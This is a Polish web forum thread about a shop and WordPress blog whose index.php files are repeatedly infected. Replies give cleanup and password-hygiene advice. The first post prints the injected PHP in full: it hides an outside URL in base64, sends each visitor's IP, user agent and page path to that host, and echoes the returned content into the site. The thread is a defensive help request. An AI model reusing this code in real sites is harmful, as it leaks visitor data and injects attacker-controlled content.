Złośliwy kod w plikach php

[Mars_2000]

Cześć,

Szukam kogoś w gronie forumowiczów, kto byłby w stanie pomóc znaleźć mi rozwiązanie następującego problemu.

Otóż, moja żona prowadzi małą działalność gospodarczą (sklep internetowy) i przy tej okazji autorskiego bloga hobbystycznego.

Od jakiegoś czasu zauważyłem, że regularnie w plikach indeks.php zarówno w lokalizacji sklepu oraz w blogu (przynajmniej w tych znalazłem) pojawia się następujący kod, który chyba nie jest niczym dobrym:

 

<?php

if (!isset($sRetry))

{

global $sRetry;

$sRetry = 1;

// This code use for global bot statistic

$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot

$sUserAgen = "";

$stCurlHandle = NULL;

$stCurlLink = "";

if((strstr($sUserAgen, 'google') == false)&&(strstr($sUserAgen, 'yahoo') == false)&&(strstr($sUserAgen, 'baidu') == false)&&(strstr($sUserAgen, 'msn') == false)&&(strstr($sUserAgen, 'opera') == false)&&(strstr($sUserAgen, 'chrome') == false)&&(strstr($sUserAgen, 'bing') == false)&&(strstr($sUserAgen, 'safari') == false)&&(strstr($sUserAgen, 'bot') == false)) // Bot comes

{

if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics

$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

@$stCurlHandle = curl_init( $stCurlLink );

}

}

if ( $stCurlHandle !== NULL )

{

curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);

$sResult = @curl_exec($stCurlHandle);

if ($sResult[0]=="O")

{$sResult[0]=" ";

echo $sResult; // Statistic code end

}

curl_close($stCurlHandle);

}

}

?><?php

Piszę chyba, bo pierwszy raz jak doszło do zainfekowania plików php takim samym kodem (wiem to z porównania plików oryginalnych zaarchiwizowanych na dysku), to witryny aż trafiły na czarną listę google i wyświetlało się ostrzeżenie , że strony są potencjalnie niebezpieczne. A co to oznacza dla sklepu internetowego , to chyba tłumaczyć nie trzeba.

Dopiero usunięcie powyższych kodów i zgłoszenie stron do przeskanowania w google admin tools spowodowało zdjęcie ostrzeżenia.

 

Niestety, jak napisałem na początku kody "wracają".

Nie pomogły zmiany wszystkich haseł (do ftp, głównych dostępowych do hostingu, adminów bloga czy sklepu), podobnie nic nie daje ustawienie atrybutu "read only" na infekowanych plikach.

Kod zostaje w jakiś sposób doklejony i już.

Doszło obecnie do sytuacji, że codziennie po parę razy wchodzę w cPanelu do aplikacji menadżera plików i sprawdzam te 2 pliki na hostingu czy są zmienione czy nie.

 

Dodam tylko , że oprogramowanie sklepu jest licencjonowane (shoper.pl) , a za hosting odpowiada też w miarę znana firma (Netmark.pl). Natomiast po przeczesywaniu internetu doszedłem do wniosku, że chyba winowajcą będzie blog żony oparty na wordpresie , który jest umieszczony również na tej samej domenie. Ponoć wordpress jest słabo zabezpieczonym oprogramowaniem.

Czy ktoś z szanownych forumowiczów zna się na tyle na tym wszystkim , aby podpowiedzieć co można zrobić aby pozbyć się tego dziadowstwa raz a dobrze ? Jeśli to 100% wordpress, to całowite usunięcie bloga nie wchodzi w grę, ale może jest jakiś sposób aby "napisać/utworzyć" go inaczej, całą zawartość przetransferować i oprogramowanie wordpressa wywalić ?

Ja, niestety, informatykiem nie jestem i właśnie doszedłem do"kresu" swoich skromnych umiejętności , stąd to szukanie pomocy...

[Xeo]

Wpisy z WP można spokojnie importować/exportować

Na twoim miejscu zrobilbym właśnie taki backup treści i przeinstalował WP. Generalnie wpis to open source wiec możliwość infekcji przez niego jest spora.

 

~wysłane z LG p760 przy użyciu Tapatalk~

[Pacza]

A że tak nieśmiało zapytam. Czy hasła masz zapisane w programach typu TotalCommander, przeglądarki internetowe albo nie daj boże na sztywno wpisane z jakimś pliku strony?

 

Miałem podobną sytuację. Hasła zawsze podaję z palca w klientach FTP i panelach administracyjnych - nie zapisuję w historiach i innych badziewiach. Dodatkowo okazało się, że ktoś kto robił stronę radośnie zapisał hasło w jednym z plików php.

 

Po tych operacjach wszystko ustało.

 

A!! Jeszcze jedno. Przeskanuj dokładnie komputer z którego aktualizujesz stronę.

[robertus]

Maciek ma dobrą sugestię, Miałem kiedyś podobnie.

Wyczyść kod, zmień hasła, przeskanuj komputery z którymi się łączysz do witryny.

[plisken]

I zmień WP na najnowszą joomlę, lub zainwestuj w jakiś komercyjny skrypt. WP jest strasznie dziurawe.

[Mars_2000]

Panowie.

Dziękuję za szybki odzew

 

Po pierwsze...hasła były zmienione na silne typu duże i małe litery, cyfry i znaki specjalne, ale dla wygody są zapisane w pamięci przeglądarek i teraz rozumiem, że to duży błąd.

Klient FTP (filezilla) też ma zapisane łączenie z hasłem włącznie

 

Zatem dzisiaj zrobię operację zmian haseł jeszcze raz i tym razem żadnego zapamiętywania ich gdziekolwiek indziej niż w głowie

 

Komputery były przeskanowane kilkukrotnie (zresztą jest to robione cyklicznie). Do tego celu mamy oczywiście legalne programy antyvirusowe z McAfee poinstalowane na naszych laptopach i póki co nic one nie wychwyciły.

Pobrałem też pełną zawartość z domeny na dysk twardy i przeskanowałem antywirusem i anty-malvare , w celu znalezienia czegoś podejrzanego. Efekt - zero, nic... czysto niczym w toalecie po potraktowaniu domestosem

 

I zmień WP na najnowszą joomlę, lub zainwestuj w jakiś komercyjny skrypt. WP jest strasznie dziurawe.

 

A znasz może jakieś komercyjne skrypty ?

Popatrzę sobie również na wspominaną joomlę.

 

Faktycznie, wordpress może jest i łatwy w obsłudze (zwłaszcza dla mojej żony), ale po tym wszystkim, to plan używania go na dłuższą metę chyba trzeba definitywnie zrewidować...

[pukas]

W większości przypadków infekcja plików php odbywa się przez ftp drogą zapamiętanego hasła w jakimś kliencie ftp. Hasła trzeba zrobić mocne, ale wg schematu łatwego do zapamiętania i trzymać je w głowie :-)No i oczywiście aktualizować oprogramowanie regularnie.Sent from my ASUS Transformer Pad TF700T using Tapatalk 4

[mr.suchy]

Cześć,

 

To co podałeś w pierwszym poście to malware. Przeskanuj swoją stronę z tego odnosnika: http://sitecheck.sucuri.net/scanner/

Problem wystepuje w Wordpress i Joomla. Więc mówienie że coś jest lepsze od drugiego jest... Problem standardowo nie lezy w silniku WP czy Joomla tlyko w dodatkach a tej infromacji nie podałes. Tak na szybko:

1. Usuń dodatki związane z grafika a w sumie, które opierają sie na pliku timthumb.php,

2. Wykonaj aktualizację automatyczną nawet jeżeli masz już najnowszą wersję.

3. Aktualizacja skryptów, pluginów.

4. Sprawdź theme.

5. Przeskanuj stronę www.

6. Zmień hasła.

 

Pozdrawiam

[plisken]

Problem wystepuje w Wordpress i Joomla. Więc mówienie że coś jest lepsze od drugiego jest...

Takie problemy występują chyba we wszystkich darmowych silnikach (zaleta open source ). Z doświadczenia mojego, a także mojego kolegi z pracy (webmastera) mogę stwierdzić, że na bieżąco aktualizowana joomla jest bezpieczniejsza niż WP.

 

Co do płatnego CMS'a to z tego co się orientuję to IP.Content jest bardzo fajny, ale niestety aby go zakupić należy mieć aktywną licencję IP.Board lub zakupić je razem, a to już koszt zdaje się $220+

[mr.suchy]

Takie problemy występują chyba we wszystkich darmowych silnikach (zaleta open source ). Z doświadczenia mojego, a także mojego kolegi z pracy (webmastera) mogę stwierdzić, że na bieżąco aktualizowana joomla jest bezpieczniejsza niż WP.

Na jakiej podsatwwie twierdzisz że jest bezpieczniejsze, masz najnowsze exploity ? Tu nie chodzi o opensource tylko o popularność i tyle. A co jest lepsze ? Ciężko stwierdzić. Wiele znanych stron siedzi na J!, WP czy Nasza oficialna strony Prezydencji w UE chodzi na Drupalu.

[plisken]

Nie mam Sam nie bawię się już webmasterką.

Ostatnio mieliśmy w pracy spory problem ze spamem, okazało się, że do tego celu zostało wykorzystanych kilka serwisów działających na naszych serwerach. Były to serwisy na oparte na WP oraz J! w wersji 1.5.

Wszystkie strony opartej o J! w wersjach 2+ były czyste.

 

Faktycznie jest tak, że najwięcej jest sposobów dorwania się do najpopularniejszych serwisów, szczególnie, że kod źródłowy jest ogólnie dostępny. Z płatnymi CMS'ami jest trudniej, do tego po kupnie takiego cms'a dostaje się support, który może okazać się przydatny. Sam do niedawna prowadziłem forum. Był czas kiedy to co rusz mieliśmy włam. Raz to zostały usunięte wszystkie pliki, raz wyczyszczona baza itp. Kupiłem wtedy IPB, zmieniłem wszystkie hasła, odtworzyłem backup, konwersja, poprawki, czyszczenie starych plików i od tego czasu spokój. Do tego po zakupie miałem wsparcie techniczne przy migracji itp.

[Mars_2000]

Panowie,

"Nie chcę chwalić dnia przed zachodem słońca" , ale jak na razie dzisiaj nie było "wklejki" złośliwego kodu

Idąc za Waszymi radami, zapisane hasła w klientach FTP usunąłem i o dziwo jest spokój.

Dodatkowo, po raz pierwszy od dłuższego czasu nie logowałem się do bloga czy cpanelu na koncie hostingowym przy użyciu blueconnecta (zwykle w ciągu dnia to robię w ten sposób , bo niestety, u mnie w pracy dostęp do wybranych stron poprzez tradycyjny LAN jest zablokowany i wówczas jedyne obejście tego zakzu jest możliwe poprzez połączenie sieciami 3G).

Zauważyłem bowiem , że jak skorzystałem właśnie z BT, to mój wczoraj nowo zainstalowany anty-malware zgłasił próby wrzucenia mi na kompa jakiś trojanów czy plików malware. Może to było to ?

 

Na ten moment nie pozostaje mi nic innego jak bacznie obserwować , co się będzie działo. Mam taką cichą nadzieję, że udało się zminimalizować ryzyko ponownej infekcji , dzięki zastosowaniu tych wszystkich środków.

Jeszcze raz dziękuję za komentarze i rady